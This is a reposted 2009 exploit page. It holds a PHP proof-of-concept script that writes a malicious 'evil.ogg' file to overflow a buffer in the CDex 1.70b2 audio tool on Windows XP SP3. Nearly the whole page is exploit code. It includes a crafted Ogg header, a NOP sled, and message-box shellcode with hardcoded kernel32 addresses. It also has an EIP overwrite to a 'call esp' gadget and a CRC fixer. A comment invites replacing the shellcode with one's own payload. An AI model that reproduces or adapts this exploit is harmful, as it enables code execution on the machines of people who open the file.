Home / os / win10

cdex-overflow.txt

Posted on 19 March 2009

<?PHP
/*
CDex v1.70b2 (.ogg) local buffer overflow exploit poc (win xp sp3)
by Nine:Situations:Group::Pyrokinesis

software site: http://cdexos.sourceforge.net/
our site: http://retrogod.altervista.org/

A very reliable buffer overflow exists in the way cdex process Ogg Vorbis Info
headers.
usage:
c:phpphp 9sg_cdex_local.php
evil.ogg is created, now navigate:
Main Menu-> Tools -> Media file Player -> Select files -> Browse to a folder ->
-> Open -> Play evil.ogg
*/

$_frgmnt1 =
"OggS".                             //for what I understood ... beginning
"x00".                             //stream_structure_version
"x02".                             //header_type_flag
"x00x00x00x00x00x00x00x00". //granular_position
"x66x07x00x00".                 //bitstream_serial_number
"x00x00x00x00".                 //page_sequence_number
"x92xa8x3bxd9".                 //CRC_checksum
"x01".                             //number_page_segments
"x1e".                             //segments_table
"x01".
"vorbis".
"x00x00x00x00x02x44xacx00x00x00x00x00x00".
"x00x71x02x00x00x00x00x00xb8x01";

$_frgmnt2 =
"OggS".
"x00x00x00x00x00x00x00x00x00x00x66x07".
"x00x00x01x00x00x00".
"x00x00x00x00". //set crc to 0, after calculate the real crc
"x51xffxffxffxffxffxffxffxffxffxffxff".
"xffxffxffxffxffxffxffxffxffxffxffxffxffxffxffxff".
"xffxffxffxffxffxffxffxffxffxffxffxffxffxffxffxff".
"xffxffxffxffxffxffxffxffxffxffxffxffxffxffxffxff".
"xffxffxffxffxffx93xffxffxffxffxffxffxffxffxffxff".
"xffxffxffxffxffxffx03vorbisx1dx00x00".
"x00Xiph.Orgx20libVor".
"bisx20Ix2020040629x03x00".
"x00x00x07x20x00x00".
"ARTIST=";

$payload_len=8192;

//msg box shellcode saying "hey" ...
//replace with your own, the script recalculates the CRC checksum
$scode =
"x31xc0x31xdbx31xc9x31xd2xebx37x59x88x51x0a".
"xbbx7bx1dx80x7c". //LoadLibraryA at 0x7c801d7b in kernel32.dll  xpsp3
"x51xffxd3xebx39x59x31xd2x88x51x0bx51x50".
"xbbx30xaex80x7c". //GetProcAddress at 0x7c80ae30 in kernel32.dll
"xffxd3xebx39x59x31xd2x88x51x03x31xd2x52x51".
"x51x52xffxd0x31xd2x50".
"xb8xfaxcax81x7c". //ExitProcess at 0x7c81cafa in kernel32.dll
"xffxd0xe8xc4xff".
"xffxffx75x73x65x72x33x32x2ex64x6cx6cx4exe8xc2xffxff".
"xffx4dx65x73x73x61x67x65x42x6fx78x41x4exe8xc2xffxff".
"xffx48x65x79x4e";

$_boom=str_repeat("x90",2048 - strlen($scode)).$scode.
"x67x86x86x7c".  //eip -> 0x7C868667      call esp kernel32.dll
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90".
"x83xecx7f". // sub esp,07f
"x83xecx7f". //..
"x83xecx7f". //..
"x83xecx7f". //..
"x83xecx7f". //..
"xffxd4". //call esp
"x90x90x90".
"x00x00x00x00";//if replaced with non-zero chars, overwrites seh ... do not touch

$_frgmnt2.=$_boom."x90x90x90x90x90x90x90x90".str_repeat("x90",$payload_len - strlen($_boom) - 8);
$_frgmnt2.="x0ax20x00x00".
"PERFORMER=";
$_frgmnt2.=str_repeat("x90",$payload_len);
$_frgmnt2.="x09x00x00x00".
"DATE=2009".
"x01x05".
"vorbis".
"x29x42x43x56x01x00x08x00x00x00x31x4cx20xc5x80xd0".
"x90x55x00x00x10x00x00".
"x60x24x29x0ex93x66x49x29xa5".
"x94xa1x28x79x98x94x48x49x29xa5x94xc5x30x89x98x94".
"x89xc5x18x63x8cx31xc6x18x63x8cx31xc6x18x63x8cx20".
"x34x64x15x00x00x04x00x80x28x09x8exa3xe6x49x6axce".
"x39x67x18x27x8ex72xa0x39x69x4ex38xa7x20x07x8ax51".
"xe0x39x09xc2xf5x26x63x6exa6xb4xa6x6bx6excex29x25".
"x08x0dx59x05x00x00x02x00x40x48x21x85x14x52x48x21".
"x85x14x62x88x21x86x18x62x88x21x87x1cx72xc8x21xa7".
"x9cx72x0ax2axa8xa0x82x0ax32xc8x20x83x4cx32xe9xa4".
"x93x4ex3axe9xa8xa3x8ex3axeax28xb4xd0x42x0bx2dxb4".
"xd2x4ax4cx31xd5x56x63xaexbdx06x5dx7cx73xcex39xe7".
"x9cx73xcex39xe7x9cx73xcex09x42x43x56x01x00x20x00".
"x00x04x42x06x19x64x10x42x08x21x85x14x52x88x29xa6".
"x98x72x0ax32xc8x80xd0x90x55x00x00x20x00x80x00x00".
"x00x00x47x91x14x49xb1x14xcbxb1x1cxcdxd1x24x4fxf2".
"x2cx51x13x35xd1x33x45x53x54x4dx55x55x55x55x75x5d".
"x57x76x65xd7x76x75xd7x76x7dx59x98x85x5bxb8x7dx59".
"xb8x85x5bxd8x85x5dxf7x85x61x18x86x61x18x86x61x18".
"x86x61xf8x7dxdfxf7x7dxdfxf7x7dx20x34x64x15x00x20".
"x01x00xa0x23x39x96xe3x29xa2x22x1axa2xe2x39xa2x03".
"x84x86xacx02x00x64x00x00x04x00x20x09x92x22x29x92".
"xa3x49xa6x66x6axaex69x9bxb6x68xabxb6x6dxcbxb2x2c".
"xcbxb2x0cx84x86xacx02x00x00x01x00x04x00x00x00x00".
"x00xa0x69x9axa6x69x9axa6x69x9axa6x69x9axa6x69x9a".
"xa6x69x9axa6x69x9ax66x59x96x65x59x96x65x59x96x65".
"x59x96x65x59x96x65x59x96x65x59x96x65x59x96x65x59".
"x96x65x59x96x65x59x96x65x59x96x65x59x40x68xc8x2a".
"x00x40x02x00x40xc7x71x1cxc7x71x24x45x52x24xc7x72".
"x2cx07x08x0dx59x05x00xc8x00x00x08x00x40x52x2cxc5".
"x72x34x47x73x34xc7x73x3cxc7x73x3cx47x74x44xc9x94".
"x4cxcdxf4x4cx0fx08x0dx59x05x00x00x02x00x08x00x00".
"x00x00x00x40x31x1cxc5x71x1cxc9xd1x24x4fx52x2dxd3".
"x72x35x57x73x3dxd7x73x4dxd7x75x5dx57x55x55x55x55".
"x55x55x55x55x55x55x55x55x55x55x55x55x55x55x55x55".
"x55x55x55x55x55x55x55x55x55x55x55x55x55x55x81xd0".
"x90x55x00x00x04x00x00x21x9dx66x96x6ax80x08x33x90".
"x61x20x34x64x15x00x80x00x00x00x18xa1x08x43x0cx08".
"x0dx59x05x00x00x04x00x00x88xa1xe4x20x9axd0x9axf3".
"xcdx39x0ex9axe5xa0xa9x14x9bxd3xc1x89x54x9bx27xb9".
"xa9x98x9bx73xcex39xe7x9cx6cxcex19xe3x9cx73xcex29".
"xcax99xc5xa0x99xd0x9ax73xcex49x0cx9axa5xa0x99xd0".
"x9ax73xcex79x12x9bx07xadxa9xd2x9ax73xcex19xe7x9c".
"x0exc6x19x61x9cx73xcex69xd2x9ax07xa9xd9x58x9bx73".
"xcex59xd0x9axe6xa8xb9x14x9bx73xcex89x94x9bx27xb5".
"xb9x54x9bx73xcex39xe7x9cx73xcex39xe7x9cx73xcexa9".
"x5ex9cxcexc1x39xe1x9cx73xcex89xdax9bx6bxb9x09x5d".
"x9cx73xcexf9x64x9cxeexcdx09xe1x9cx73xcex39xe7x9c".
"x73xcex39xe7x9cx73xcex09x42x43x56x01x00x40x00x00".
"x04x61xd8x18xc6x9dx82x20x7dx8ex06x62x14x21xa6x21".
"x93x1ex74x8fx0ex93xa0x31xc8x29xa4x1ex8dx8ex46x4a".
"xa9x83x50x52x19x27xa5x74x82xd0x90x55x00x00x20x00".
"x00x84x10x52x48x21x85x14x52x48x21x85x14x52x48x21".
"x86x18x62x88x21xa7x9cx72x0ax2axa8xa4x92x8ax2axca".
"x28xb3xccx32xcbx2cxb3xccx32xcbxacxc3xcex3axebxb0".
"xc3x10x43x0cx31xb4xd2x4ax2cx35xd5x56x63x8dxb5xe6".
"x9ex73xaex39x48x6bxa5xb5xd6x5ax2bxa5x94x52x4ax29".
"xa5x20x34x64x15x00x00x02x00x40x20x64x90x41x06x19".
"x85x14x52x48x21x86x98x72xcax29xa7xa0x82x0ax08x0d".
"x59x05x00x00x02x00x08x00x00x00xf0x24xcfx11x1dxd1".
"x11x1dxd1x11x1dxd1x11x1dxd1x11x1dxcfxf1x1cx51x12".
"x25x51x12x25xd1x32x2dx53x33x3dx55x54x55x57x76x6d".
"x59x97x75xdbxb7x85x5dxd8x75xdfxd7x7dxdfxd7x8dx5f".
"x17x86x65x59x96x65x59x96x65x59x96x65x59x96x65x59".
"x96x65x09x42x43x56x01x00x20x00x00x00x42x08x21x84".
"x14x52x48x21x85x94x62x8cx31xc7x9cx83x4ex42x09x81".
"xd0x90x55x00x00x20x00x80x00x00x00x00x47x71x14xc7".
"x91x1cxc9x91x24x4bxb2x24x4dxd2x2cxcdxf2x34x4fxf3".
"x34xd1x13x45x51x34x4dx53x15x5dxd1x15x75xd3x16x65".
"x53x36x5dxd3x35x65xd3x55x65xd5x76x65xd9xb6x65x5b".
"xb7x7dx59xb6x7dxdfxf7x7dxdfxf7x7dxdfxf7x7dxdfxf7".
"x7dxdfxd7x75x20x34x64x15x00x20x01x00xa0x23x39x92".
"x22x29x92x22x39x8exe3x48x92x04x84x86xacx02x00x64".
"x00x00x04x00xa0x28x8exe2x38x8ex23x49x92x24x59x92".
"x26x79x96x67x89x9axa9x99x9exe9xa9xa2x0ax84x86xac".
"x02x00x00x01x00x04x00x00x00x00x00xa0x68x8axa7x98".
"x8axa7x88x8axe7x88x8ex28x89x96x69x89x9axaaxb9xa2".
"x6cxcaxaexebxbaxaexebxbaxaexebxbaxaexebxbaxaexeb".
"xbaxaexebxbaxaexebxbaxaexebxbaxaexebxbaxaexebxba".
"xaexebxbaxaexebxbax40x68xc8x2ax00x40x02x00x40x47".
"x72x24x47x72x24x45x52x24x45x72x24x07x08x0dx59x05".
"x00xc8x00x00x08x00xc0x31x1cx43x52x24xc7xb2x2cx4d".
"xf3x34x4fxf3x34xd1x13x3dxd1x33x3dx55x74x45x17x08".
"x0dx59x05x00x00x02x00x08x00x00x00x00x00xc0x90x0c".
"x4bxb1x1cxcdxd1x24x51x52x2dxd5x52x35xd5x52x2dx55".
"x54x3dx55x55x55x55x55x55x55x55x55x55x55x55x55x55".
"x55x55x55x55x55x55x55x55x55x55x55x55x55x55x55x55".
"x55x55x55xd5x34x4dxd3x34x81xd0x90x95x00x00x19x00".
"x00xe4xa4xa6xd4x7ax0ex12x62x90x39x89x41x68x08x49".
"xc4x1cxc5x5cx3axe9x9cxa3x5cx8cx87x90x23x46x49xed".
"x21x53xccx10x04xb5x98xd0x49x85x14xd4xe2x5ax6ax1d".
"x73x54x8bx8dxadx64x48x41x2dxb6xc6x52x21xe5xa8x07".
"x42x43x56x08x00xa1x19x00x0exc7x01x1cx4dx03x1cx4b".
"x03x00x00x00x00x00x00x00x49xd3x00x4dx14x01xcdx13".
"x01x00x00x00x00x00x00xc0xd1x34x40x13x3dx40x13x45".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x1cx4dx03x34x51x04x34x51x04x00x00x00".
"x00x00x00x00x4dx14x01xd1x54x01xd1x34x01x00x00x00".
"x00x00x00x40x13x45xc0x33x45x40x34x55x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x1cx4dx03x34x51x04x34x51x04x00x00x00x00x00x00x00".
"x4dx14x01x51x35x01x4fx34x01x00x00x00x00x00x00x40".
"x13x45x40x34x4dx40x54x4dx00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x01".
"x00x00x01x0ex00x00x01x16x42xa1x21x2bx02x80x38x01".
"x00x87xe3x40x92x20x49xf0x34x80x63x59xf0x3cx78x1a".
"x4cx13xe0x58x16x3cx0fx9ax07xd3x04x00x00x00x00x00".
"x00x00x00x00x40xf2x34x78x1ex3cx0fxa6x09x90x34x0f".
"x9ex07xcfx83x69x02x00x00x00x00x00x00x00x00x00x20".
"x79x1ex3cx0fx9ex07xd3x04x48x9ex07xcfx83xe7xc1x34".
"x01x00x00x00x00x00x00x00x00x00xf0x4cx13xa6x09xd1".
"x84x6ax02x3cxd3x84x69xc2x34x61xaax00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x80x00x00x80x01x07x00x80x00x13xcax40xa1x21x2b".
"x02x80x38x01x00x87xa3x48x12x00x00x38x92x64x59x00".
"x00xa0x48x92x65x01x00x80x65x59x9ex07x00x00x92x65".
"x79x1ex00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x80x00x00x80x01x07x00x80x00x13xcax40xa1x21".
"x2bx01x80x28x00x00x87xa2x58x16x70x1cxcbx02x8ex63".
"x59x40x92x2cx0bx60x59x00x4dx03x78x1ax40x14x01x80".
"x00x00x80x02x07x00x80x00x1bx34x25x16x07x28x34x64".
"x25x00x10x05x00xe0x70x14xcbxd2x34x51xe4x38x96xa5".
"x69xa2xc8x71x2cx4bxd3x44x91x65x69x9axa6x89x22x34".
"x4bxd3x44x11x9exe7x79xa6x09xcfxf3x3cxd3x84x28x8a".
"xa2x69x02x51x34x4dx01x00x00x05x0ex00x00x01x36x68".
"x4ax2cx0ex50x68xc8x4ax00x20x24x00xc0xe1x38x96xe5".
"x79xa2x28x8axa6x69x9axaaxcax71x2cxcbxf3x44x51x14".
"x4dx53x55x5dx97xe3x58x96xe7x89xa2x28x9axa6xaaxba".
"x2excbxd2x34xcfx13x45x51x34x4dx55x75x5dx68x9axe7".
"x89xa2x28x9axa6xaaxbax2ex34x4dx14x4dxd3x34x55x55".
"x55x5dx17x9axe6x89xa6x69x9axaaxaaxaaxaex0bxcfx13".
"x45xd3x34x4dx55x75x5dxd7x05xa2x68x9axa6xa9xaaxae".
"xebxbax40x14x4dxd3x34x55xd5x75x5dx17x88xa2x68x9a".
"xa6xaaxbaxaexebx02xd3x34x4dx55x55x5dxd7x95x65x80".
"x69xaaxaaxaaxbaxaex2cx03x54x55x55x5dxd7x95x65x19".
"xa0xaaxaaxeaxbaxaex2bxcbx00xd7x75x5dxd9x95x65x59".
"x06xe0xbaxaex2bxcbxb2x2cx00x00xe0xc0x01x00x20xc0".
"x08x3axc9xa8xb2x08x1bx4dxb8xf0x00x14x1axb2x22x00".
"x88x02x00x00x8cx61x4ax31xa5x0cx63x12x42x0axa1x61".
"x4cx42x48x21x64x52x52x2ax29xa5x0ax42x2ax25x95x52".
"x41x48xa5xa4x52x32x4ax2dxa5x96x52x05x21x95x92x4a".
"xa9x20xa4x52x52x29x05x00x80x1dx38x00x80x1dx58x08".
"x85x86xacx04x00xf2x00x00x08x63x94x62xccx39xe7x24".
"x42x4ax31xe6x9cx73x12x21xa5x18x73xcex39xa9x14x63".
"xcex39xe7x9cx94x92x31xe7x9cx73x4ex4axc9x98x73xce".
"x39x27xa5x64xccx39xe7x9cx93x52x3axe7x9cx73x0ex4a".
"x29xa5x74xcex39xe7xa4x94x52x42xe8x9cx73x52x4ax29".
"x9dx73xcex39x01x00x40x05x0ex00x00x01x36x8ax6cx4e".
"x30x12x54x68xc8x4ax00x20x15x00xc0xe0x38x96xa5x69".
"x9ex27x8axa6x69x49x92xa6x79x9ex27x9axa6x69x6ax92".
"xa4x69x9ex27x8axa6x69x9ax3cxcfxf3x44x51x14x4dx53".
"x55x79x9exe7x89xa2x28x9axa6xaax72x5dx51x14x4dxd3".
"x34x4dx55x25xcbxa2x28x8axa6xa9xaaxaax0axd3x34x4d".
"xd3x54x55x55x85x69x9axa6x69xaaxaaxebxc2xb6x55x55".
"x55x5dxd7x75x61xdbxaaxaaxaaxaexebxbaxc0x75x5dxd7".
"x75x65x19xb8xaexebxbaxaex2cx0bx00x00x4fx70x00x00".
"x2axb0x61x75x84x93xa2xb1xc0x42x43x56x02x00x19x00".
"x00x84x31x08x29x84x10x52x06x21xa4x10x42x48x29x85".
"x90x00x00x80x01x07x00x80x00x13xcax40xa1x21x2bx01".
"x80x70x00x00x80x10x8cx31xc6x18x63x8cx31x36x8cx61".
"x8cx31xc6x18x63x8cx31x71x0ax63x8cx31xc6x18x63x8c".
"x31xc6x18x63x8cx31xc6x18x63x8cx31xc6x18x63x8cx31".
"xc6x18x63x8cx31xc6x18x63x8cx31xc6x18x63x8cx31xc6".
"x18x63x8cx31xc6x18x63x8cx31xc6x18x63x8cx31xc6x18".
"x63x8cx31xc6x18x63x8cx31xc6x18x63x8cx31xc6x18x63".
"x8cx31xc6x18x63x8cx31xc6x18x63x8cx31xc6x18x63x8c".
"x31xc6x18x63x8cx31xc6x18x63x8cx31xc6x18x63x8cx31".
"xc6x18x63x8cx31xc6x18x63x8cx31xc6xd8x5ax6bxadxb5".
"x56x00x18xcex85x03x40x59x84x8dx33xacx24x9dx15x8e".
"x06x17x1axb2x12x00x08x09x00x00x8cx41x88x31xe8x24".
"x94x92x4ax4ax15x42x8cx39x28x25x95x96x5ax8axadx42".
"x88x31x08xa5xa4xd4x5ax6cx31x16xcfx39x07xa1xa4x94".
"x5ax8ax29xb6xe2x39xe7xa4xa4xd4x5ax8cx31xc6x5ax5c".
"x0bx21xa5x94x5ax8bx2dxb6x18x9bx6cx21xa4x94x52x6b".
"x31xc6x5ax63x33x4axb5x94x5ax8bx31xc6x18x6bx2cx4a".
"xb9x94x52x6bxb1xc5x18x6bx8dx45x28x9bx5bx6bx31xc6".
"x5ax6bxadx35x29xe5x73x4bxb1xd5x5ax63xacxb5x26xa3".
"x8cx92x31xc6x5ax6bxacxb5xd6x22x94x52x32xc6x14x53".
"xacxb5xd6x9ax84x30xc6xf7x18x63xacx31xe7x5ax93x12".
"xc2xf8x1ex53x2dxb1xd5x5ax6bx52x4ax29x23x64x8dxa9".
"xc6x5ax73x4ex4ax09x65x8cx8dx2dxd5x94x73xcex05x00".
"x40x3dx38x00x40x25x18x41x27x19x55x16x61xa3x09x17".
"x1ex80x42x43x56x02x00xb9x01x00x08x42x4ax31xc6x98".
"x73xcex39xe7x9cx73x0ex52xa4x18x73xccx39xe7x20x84".
"x10x42x08x21xa4x08x31xc6x98x73xcex41x08x21x84x10".
"x42x48x19x63xccx39xe7x20x84x10x42x08xa1x84x92x52".
"xcax98x73xcex41x08x21x84x52x4ax29x25xa5xd4x39xe7".
"x20x84x10x42x28xa5x94x52x4ax4axa9x73xcex41x08x21".
"x84x52x4ax29xa5x94x94x52x08x21x84x10x42x08xa5x94".
"x52x4ax29x29xa5x94x42x08x21x84x12x4ax29xa5x94x52".
"x52x4ax29x85x10x42x08xa5x94x52x4ax29xa5xa4x94x52".
"x0ax21x84x10x4ax29xa5x94x52x4ax49x29xa5x14x42x09".
"xa5x94x52x4ax29xa5x94x92x52x4ax29xa5x10x4ax29xa5".
"x94x52x4ax29x25xa5x94x52x4axa5x94x52x4ax29xa5x94".
"x52x4ax4ax29xa5x94x4ax29xa5x94x52x4ax29xa5x94x94".
"x52x4ax29x95x52x4ax29xa5x94x52x4ax29x29xa5x94x52".
"x4axa9x94x52x4ax29xa5x94x52x52x4ax29xa5x94x52x29".
"xa5x94x52x4ax29xa5xa4x94x52x4ax29xa5x52x4ax29xa5".
"x94x52x4ax49x29xa5x94x52x4axa5x94x52x4ax29xa5x94".
"x92x52x4ax29xa5x94x52x2axa5x94x52x4ax29xa5x00x00".
"xa0x03x07x00x80x00x23x2ax2dxc4x4ex33xaex3cx02x47".
"x14x32x4cx40x85x86xacx04x00xc8x00x00x10x07xb1xb4".
"xd6x5axabx8cx72xcax49x49xadx43x46x1axe6xa0xa4xd8".
"x49x07x21xb5x58x4bx65x20x41xcax49x4ax9dx82x08x29".
"x06xa9x85x8cx2axa5x98x93x96x42xcbx98x52x0cx62x2b".
"x31x74x8cx31x47x39xe5x54x42xc7x18x00x00x00x82x00".
"x00x03x11x32x13x08x14x40x81x81x0cx00x38x40x48x90".
"x02x00x0ax0bx0cx1dxc3x45x40x40x2ex21xa3xc0xa0x70".
"x4cx38x27x9dx36x00x00x41x88";

function crcOgg (&$_x)
{
$crc=0;
$polynom=0x04C11DB7; //polynomial generator
for ($i=0; $i<strlen($_x); $i++)
{
$c = ord($_x[$i]);
for ($j=0; $j<8; $j++)
{
$bit=0;
if ($crc&0x80000000) $bit=1;
if ($c&0x80) $bit^=1;
$c<<=1;	$crc<<=1;
if ($bit) $crc^=$polynom;
}
}
$_x[22]=chr($crc&0xFF);       $_x[23]=chr(($crc>>8)&0xFF);
$_x[24]=chr(($crc>>16)&0xFF); $_x[25]=chr(($crc>>24)&0xFF);
}

crcOgg($_frgmnt2);

$_frgmnt3="x4fx67x67x53x00x01x00".
"x00x00x00x00x00x00x00x66x07x00x00x02x00x00x00x6a".
"xa0x3fxb6x01x91xccx10x89x88xc5x20x31xa1x1ax28x2a".
"xa6x03x80xc5x05x86x7cx00xc8xd0xd8x48xbbxb8x80x2e".
"x03x5cxd0xc5x5dx07x42x08x42x10x82x58x1cx40x01x09".
"x38x38xe1x86x27xdexf0x84x1bx9cxa0x53x54xeax40x00".
"x00x00x00x00x1ex00xe0x01x00x20xd9x00x22x22xa2x99".
"xe3xe8xf0xf8x00x09x11x19x21x29x31x39x41x11x00x00".
"x00x00x00x3bx00xf8x00x00x48x52x80x88x88x68xe6x38".
"x3ax3cx3ex40x42x44x46x48x4ax4cx4ex50x02x00x00x01".
"x04x00x00x00x00x40x00x01x08x08x08x00x00x00x00x00".
"x04x00x00x00x08x08x4fx67x67x53x00x04x61x18x00x00".
"x00x00x00x00x66x07x00x00x03x00x00x00xa5xbexcfx36".
"x09x2cx86x63x01x01x01xfcxffx17xd4x1cxf7xd1x45xd0".
"xfbxcfxcex6bx8exfbxe8x22xe8xfdx67xe7x64x90x02x19".
"xc6x08x00xe2x46x62x05x6bx7fxefxb3xd8xfdxfbxefxac".
"xb4x92xc0xefx5fx05xdax65xfcxf7x48x5fxa4x80x51x33".
"x45x8bxa2xa2xcbxf8xefx91xbex48x01xa3x66x8ax16x45".
"x05x88x64x66xa7x33x49x34x00x00x24x90x02x10x38x15".
"x20x4cx00x24x00x00x00xd0x0axaaxd1x50x55x4cxd4xd2".
"x26xabx6ax9ax98x34xfex34xbaxbdx52x1dxc0x80x78xc6".
"xa2x0cx9dxe4x10x40x11x35xacx61xa3x29x50xa4x90x08".
"xd2x8ax76x50x7fx1ax5dx2bx55x48x00x94x52x4ax59x0a".
"x30x62x84xd2x96x07xc0x18xb0x80x62x8dxb7xa0x01xc1".
"x5ax23x80x01x00x00x9dx00x00x00x80x00xdex65xfcxef".
"x28x5fx4ax81xb1xc9x84xe8x32xfex77x94x2fxa5xc0xd8".
"x64x42x80x80x24x60x31x66x22x9dx0ax00x20x20x01x06".
"x00x00x00x80x2fx36xb7x2ax7cx65xb2xdexbax95xb7x4b".
"x06x72xfexeex5cx00xbex3exb3xb9x75xabx02xf0x06x38".
"x51x51x40x2cxadxd9x68x05xabx36x58xd7xa8x02x62xb1".
"x18x80xfbx9cxf9x79x73xabx02x5bxb7x7exf8xfcx19x0e".
"x0ex0exbex65xfcxf7x48x6fx8cx01x0ex90x35xdcx7cx8f".
"x77xdcxc0x34xccx1cx45x29x6ax3exe8x99x51xe2xa8x20".
"x54x90x10xe1x24x00x00x00x00x80xfax30x0cx45x44x44".
"xa4x33xcbxb2x52xa9x68xb5xdaxd5x4ax55x55x55x5dx96".
"x65xb1xfdxefxbfxffx02x5cxc6x86x61xb8x7bx79x09xac".
"xa2xaaxaaxaax4fx18x99x29x49x52xb4x2cxcbxb2x2cxcb".
"xb2x2cxcbxb2x2cxddx4dxd9xa1xaaxaex56xabxb5x6bxd7".
"x6ax57xabxd5x6axb5x5axd6x75xb5x67x06x80xccx0cx0c".
"xc3x30x0cxc3x70xa5x95x56x5axa9x01xa0xaaxecx38x8e".
"xe3x52xadx54x2ax95x4axa5x52xa9xa8xaaxaax2ex8bx67".
"x88x90xa2x28x14xbdx5exafxd7xebxf5x8axa2x14x85x88".
"x88x00xacxadxadxaaxaaxaax7fxffxfdxf7xdfxaaxaaxaa".
"x4fx46x78xdexdcxdcxdcxdcxa4x14x3ax00x00x78xc5x55".
"x55x55x55x55x55x95x87xfaxc0x30x0cxebx00x46x7dx18".
"x86x61x18x86x97xbcxcfxcfxcfxcfxcfx4fx4fx7dx7dx7d".
"x7dx7dx3dx80x5dx55xf7x7dxdfxb7x6dxffxabx00xbex65".
"xfcxf7x90x6fxacx81x35x24xebxa5x6fxcbxf8xdfx2exdf".
"x60xe0x40x46xc2xb8x34xbdx5exafxd7xebxadx61xb3x3a".
"x83xd8xa5x03xe6x18x98x04x00x00x00x60xb1xb5xb1xb7".
"x77xb4x1ax55x3ax1ex4dx4ex35xccx00x80x58x2cx56x54".
"x45xbbx6fx54xf6x48xb6x99x0fxf9x90x0fxb9xcax20x6b".
"x0dxc2x20x0cxc2x20x0cxc2x20x0cxc2x20x0cxc2x20x8c".
"xe2x28x8ex2cx6fx6ex6ex6ex1axd6xe6xe6xe6xe6x66x59".
"x96xa5xd6xc5xb2x2cxcbxb2x2cx16x8bxaaxa8x8axaaxa8".
"x7ax6dx55xadxaax8ax5ax2fxe2x1ex80x0cxcbxb2xbcx84".
"x41x18x84x41x18x84x41x18x84x41x18xacxb2x2cx0bx58".
"x65x59x96x65x59x96x37x0ex32x52x5cx94x45xa9x54xf4".
"x15x8dx6ex5dxbax75xe9xd4xa1x53x87xcex35x6bx35x5a".
"xcdx4ax51x95x55x96x1bx00x00x58x9bx00xc0x7ax6bxce".
"xf9xf6xf6xf6xf6x36x0cx2cx0bx80x92xe5xcfx9fx3fx7f".
"xfexfcxf9xb3x0bx00x23xcbx8ax83x30x08x83x30x08x17".
"xcbxb2x2cx2bxbaxf2x00x00xd4xcaxb2x94x65x59xd6xba".
"xacxcbxbaxacx8bx65x59xd3x03x00xbcx3fx7fxfexfcxf9".
"xf3xe7xcfx00x00";
$fp=fopen("evil.ogg","w+");
if (!$fp) {die("cannot create evil.ogg...");}
@fputs($fp,$_frgmnt1.$_frgmnt2.$_frgmnt3);
@fclose($fp);
?>

original url: http://retrogod.altervista.org/9sg_cdex_ogg.html

 

TOP

Malware :

Exploits :